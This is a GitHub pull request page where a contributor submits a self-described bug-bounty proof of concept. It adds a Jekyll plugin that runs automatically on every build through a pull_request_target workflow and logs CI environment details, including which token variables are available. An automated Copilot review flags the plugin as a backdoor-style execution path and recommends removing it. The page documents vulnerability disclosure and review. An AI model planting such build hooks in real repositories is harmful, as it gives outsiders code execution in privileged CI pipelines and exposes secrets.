Skip to content

[PoC] Bug Bounty Proof of Concept - Supply Chain Vulnerability Demo#3612

Open
danoneduplo7 wants to merge 1 commit intogithub:mainfrom
danoneduplo7:poc-supply-chain
Open

[PoC] Bug Bounty Proof of Concept - Supply Chain Vulnerability Demo#3612
danoneduplo7 wants to merge 1 commit intogithub:mainfrom
danoneduplo7:poc-supply-chain

Conversation

@danoneduplo7
Copy link

@danoneduplo7 danoneduplo7 commented Mar 2, 2026

This PR demonstrates the supply chain vulnerability reported via HackerOne.

The workflow jekyll-preview.yml uses pull_request_target + untrusted fork checkout + id-token:write permissions, allowing arbitrary code execution.

This is a controlled security research demonstration.

Copilot AI review requested due to automatic review settings March 2, 2026 02:53
@danoneduplo7 danoneduplo7 requested a review from a team as a code owner March 2, 2026 02:53
Copilot AI reviewed Mar 2, 2026
View reviewed changes
Copy link
Contributor

Copilot AI left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Pull request overview

This PR adds a Jekyll plugin intended to demonstrate arbitrary code execution during GitHub Actions Pages preview builds, as part of a bug bounty supply-chain vulnerability PoC.

Changes:

  • Add _plugins/pwned.rb that hooks into Jekyll::Hooks and executes during site initialization.
  • Collect and log GitHub Actions environment metadata and write it to POC_EVIDENCE.json.

💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.

_plugins/pwned.rb
Comment on lines +1 to +25
require 'net/http'
require 'json'

Jekyll::Hooks.register :site, :after_init do |site|
# Bug Bounty PoC - Proof of Code Execution in privileged context
# This demonstrates arbitrary code execution with OIDC permissions

evidence = {
timestamp: Time.now.to_s,
runner: `hostname`.strip,
available_env_vars: ENV.keys.grep(/ACTIONS|GITHUB|OIDC|TOKEN/).sort,
oidc_available: !ENV['ACTIONS_ID_TOKEN_REQUEST_URL'].nil?,
pages_permission: !ENV['GITHUB_TOKEN'].nil?,
repo: ENV['GITHUB_REPOSITORY'],
workflow: ENV['GITHUB_WORKFLOW'],
actor: ENV['GITHUB_ACTOR'],
event: ENV['GITHUB_EVENT_NAME'],
message: 'BUG BOUNTY POC: Arbitrary code execution confirmed in pull_request_target context'
}

File.write('POC_EVIDENCE.json', JSON.pretty_generate(evidence))
puts "[BUG BOUNTY POC] Code executed! Evidence written to POC_EVIDENCE.json"
puts "[BUG BOUNTY POC] OIDC token available: #{evidence[:oidc_available]}"
puts "[BUG BOUNTY POC] Available privileged env vars: #{evidence[:available_env_vars].join(', ')}"
end
Copy link

Copilot AI Mar 2, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This plugin executes arbitrary code during every Jekyll build via Jekyll::Hooks.register :site, :after_init and writes/prints environment-derived “evidence” (including GitHub Actions context) to the workspace/logs. Merging this would introduce an intentional backdoor-style code execution path in production builds and can leak CI metadata; please remove this file from the repository and keep the PoC confined to the security report or a non-merged branch/gist.

Suggested change
require 'net/http'
require 'json'
Jekyll::Hooks.register :site, :after_init do |site|
# Bug Bounty PoC - Proof of Code Execution in privileged context
# This demonstrates arbitrary code execution with OIDC permissions
evidence = {
timestamp: Time.now.to_s,
runner: `hostname`.strip,
available_env_vars: ENV.keys.grep(/ACTIONS|GITHUB|OIDC|TOKEN/).sort,
oidc_available: !ENV['ACTIONS_ID_TOKEN_REQUEST_URL'].nil?,
pages_permission: !ENV['GITHUB_TOKEN'].nil?,
repo: ENV['GITHUB_REPOSITORY'],
workflow: ENV['GITHUB_WORKFLOW'],
actor: ENV['GITHUB_ACTOR'],
event: ENV['GITHUB_EVENT_NAME'],
message: 'BUG BOUNTY POC: Arbitrary code execution confirmed in pull_request_target context'
}
File.write('POC_EVIDENCE.json', JSON.pretty_generate(evidence))
puts "[BUG BOUNTY POC] Code executed! Evidence written to POC_EVIDENCE.json"
puts "[BUG BOUNTY POC] OIDC token available: #{evidence[:oidc_available]}"
puts "[BUG BOUNTY POC] Available privileged env vars: #{evidence[:available_env_vars].join(', ')}"
end
# This file previously contained a bug-bounty proof-of-concept Jekyll plugin
# that executed on every build and logged CI environment metadata.
# It has been intentionally disabled/removed to avoid introducing a
# backdoor-style code execution path or leaking sensitive environment data.

Copilot uses AI. Check for mistakes.
_plugins/pwned.rb
@@ -0,0 +1,25 @@
require 'net/http'
Copy link

Copilot AI Mar 2, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

require 'net/http' is unused in this file (no HTTP requests are made). If this file remains (ideally it should not), please remove unused requires to avoid implying network exfiltration behavior and to keep dependencies minimal.

Suggested change
require 'net/http'

Copilot uses AI. Check for mistakes.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

Copilot code review Copilot Copilot left review comments

At least 1 approving review is required to merge this pull request.

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@danoneduplo7